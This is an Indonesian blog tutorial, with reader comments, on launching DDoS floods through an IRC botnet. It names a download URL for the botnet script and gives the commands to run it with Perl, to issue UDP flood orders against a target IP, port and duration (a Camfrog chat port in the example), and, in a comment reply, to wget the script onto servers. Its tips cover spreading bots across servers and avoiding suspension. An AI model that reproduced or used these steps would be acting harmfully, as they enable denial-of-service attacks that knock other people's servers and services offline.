Searching...
Breaking News
Loading...
Saturday, November 2, 2013

Serangan DDoS Menggunakan BOTNET IRC


assalamu'alaikum, warrah matullahi, wabarakatuh...

mohon maaf jika seandainya judul atau isi dari tulisan ini sudah ada (repost), silahkan di pindahkan atau dihapus saja juga alhamdulillah...

sesuai janji saya sama om daddybr tentang cara flood menggunakan botnet irc, dan dia sudah nagih2 sampe ane dikejar2 ke Camf**g , ya udah kita lanjut aja yah...


tutorial ini adalah tutorial cupu, karena saya belom bisa apa-apa, dan belom mengerti apa-apa. jadi buat para mastah, mohon koreksi dan bimbingan nya yah. :*

Peralatan yang dibutuhkan :

1. Siapkan Server IRC, mengapa kita harus menyiapkan server irc ??? cara install irc server
biasanya, kalo nebeng di server public otomatis bot ente kena kill gan, biasanya gitu.. kecuali ente punya solusi lain ane ga tau dah tu. cuma saran ane siapin irc server sendiri deh.

2. Siapkan Mesin Tempur (IRC BOTNET), Mengapa ..... ?
ga usah nanya deh klo ga ada mesin tempur nya, mo perang pake apa

Tahap-tahap :

1. Login ke server Irc ente gan, pake aplikasi mIRC yah jangan pake yahoo login nya , kemudian masuk ke #Channel yang anda mau.
2. download botnet IRC ente, kalo belom ada sedot dimari
Code:
http://fian.or.id/notes/botnet.txt
edit deh yang sekiranya perlu di edit
3. buka putty/winscp ente, dan kemudian upload script IRC BOTNET tadi ke server ente.
saran ane, upload diserver berbeda, makin banyak script yang ente UPLOAD makin maknyus gigitan nya.
trus run bot nya pake command :
Code:
perl botnet.txt


4. kalo ente dan bot udah masuk irc dan channel yang sama, ente bisa jalanin dah tu bot pake command flood nya
Code:
!x @udp IP PORT TIME

contoh : 
!x @udp 123.456.789.10 6005 600
yang artinya, ente flood ip : 123.456.789.10 , dengan Port : 6005 (default nya port room CF) , lama : 600 second (10menit)

example :
kalo ente ketik command flood nya nanti bot akan langsung respond dan mulai penyerangan :



Kalo bot nya udah nyelesaiin Tugas nya, tampilan nya begini :




#TIPS dari ane gan :

1. Jangan sering2 ente melakukan aktifitas flood, kasian Server orang ke Suspend (atau bahkan server ente yang kena suspend)
2. Time nya ga usah lama2 kalo bisa 300 aja.
3. coba ente KREATIF, setiap tulisan ane itu diatas ada artinya.
4. Server IRC , dan script BOTNET nya jangan menggunakan server yang sama.


#Sekian Tutorial CUPU dari ane gan, insya allah dimanfaatkan semata-mata hanya untuk ilmu pengetahuan, karena disini niat nya saya berbagi apa yang saya dapat dari ALLAH.

MOHON MAAF Apabila terdapat kesalahan bahasa dalam tulisan ane, karena kesempurnaan hanya milik ALLAH.

wabilahitaufiq wal hidayah, wassalamu'alaikum warrah matullahi wabarakatuh


Sumber Tutorial ku di Forum : http://forum.indonesianhacker.or.id/showthread.php?14793-Serangan-DDoS-Menggunakan-BOTNET-IRC&p=130645
Judul : Serangan DDoS Menggunakan BOTNET IRC
Deskripsi : assalamu'alaikum, warrah matullahi, wabarakatuh... mohon maaf jika seandainya judul atau isi dari tulisan ini sudah ada ( repost ),...
Ditulis Oleh :
Author Rating :
4/ 5 Suara

zulfianto

Nama : ZULFIANTO

Adalah Seorang IT Konsultan. di ( ELQO Media Creative ) dan anak ke-4 dari seorang ibu dan ayah yang tegas dalam mendidik kami anak-anak nya. sehingga menjadikan saya seorang yang mandiri dalam hidup, berusaha untuk tidak menyusahkan orang lain dalam sehari-hari. Lahir di :
Pekanbaru, Riau
Indonesia
Follow : zulfianto @ | |

7 comments:

  1. yoiiii ane demen ni mas tutorial nye..wkkwkkwww

    ReplyDelete
    Replies
    1. nguakakakakaka... jangan di buat nakal ye :P
      sekedar pengetahuan aja :D

      Delete
  2. Ajarin dong om fian...kaya nya seru banget tuh botnet nya.....
    Salam kenal ya om....

    ReplyDelete
    Replies
    1. huaaaaaaaaaaaaa, ada om ipay...
      om ipay culun kah ini? yang di camfrog.

      Delete
  3. wowowowowowowow Mr.Jenggot Ajarin Dong

    ReplyDelete
  4. contoh upload botnet ke server gmna gan? sry newbie :d

    ReplyDelete
    Replies
    1. pake wget aja om... posisi di root yah ( atau dmana aja boleh, asal manggil nya sesuai path)

      ex : wget http://www.fian.or.id/botnet.txt

      Delete

Jika Artikel ini bermanfaat Komentar nya doonggg.

Mohon dengan menggunakan bahasa yang enak dibaca :)